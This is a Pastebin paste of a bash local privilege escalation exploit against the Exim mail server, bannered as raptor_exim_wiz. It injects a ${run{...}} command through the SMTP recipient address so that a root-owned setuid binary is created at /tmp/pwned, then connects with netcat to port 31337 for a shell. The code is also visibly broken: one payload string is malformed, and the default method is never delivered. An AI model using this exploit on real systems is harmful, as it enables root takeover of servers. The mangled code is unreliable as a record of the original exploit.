Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #!/bin/bash
- METHOD="setuid" # default method
- PAYLOAD_SETUID='${run{\x2fbin\x2fsh\t-c\t\x22chown\troot\t\x2ftmp\x2fpwned\x3bchmod\t4755\t\x2ftmp\x2fpwned\x22}}@localhost'
- PAYLOAD_NETCAT='${run{\x2whoami\x22}}@localhost'
- # usage instructions
- function usage()
- {
- echo "$0 [-m METHOD]"
- echo "-m setuid : use the setuid payload (default)"
- echo "-m netcat : use the netcat payload"
- exit 1
- }
- # payload delivery
- function exploit()
- {
- # connect to localhost:25
- exec 3<>/dev/tcp/localhost/25
- # deliver the payload
- read -u 3 && echo $REPLY
- echo "helo localhost" >&3
- read -u 3 && echo $REPLY
- echo "mail from:<>" >&3
- read -u 3 && echo $REPLY
- echo "rcpt to:<$PAYLOAD>" >&3
- read -u 3 && echo $REPLY
- echo "data" >&3
- read -u 3 && echo $REPLY
- for i in {1..31}
- do
- echo "Received: $i" >&3
- done
- echo "." >&3
- read -u 3 && echo $REPLY
- echo "quit" >&3
- read -u 3 && echo $REPLY
- }
- # print banner
- echo 'raptor_exim_wiz - "The Return of the WIZard" LPE exploit'
- echo 'Copyright (c) 2019 Marco Ivaldi <raptor@0xdeadbeef.info>'
- # parse command line
- while [ ! -z "$1" ]; do
- case $1 in
- -m) shift; METHOD="$1"; shift;;
- * ) usage
- ;;
- esac
- done
- if [ -z $METHOD ]; then
- usage
- fi
- if [ $METHOD = "netcat" ]; then
- # select and deliver the payload
- echo "Delivering $METHOD payload..."
- PAYLOAD=$PAYLOAD_NETCAT
- exploit
- # wait for the magic to happen and spawn our shell
- echo "Waiting 5 seconds..."
- sleep 5
- nc -v 127.0.0.1 31337
- # print help
- else
- usage
- fi
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement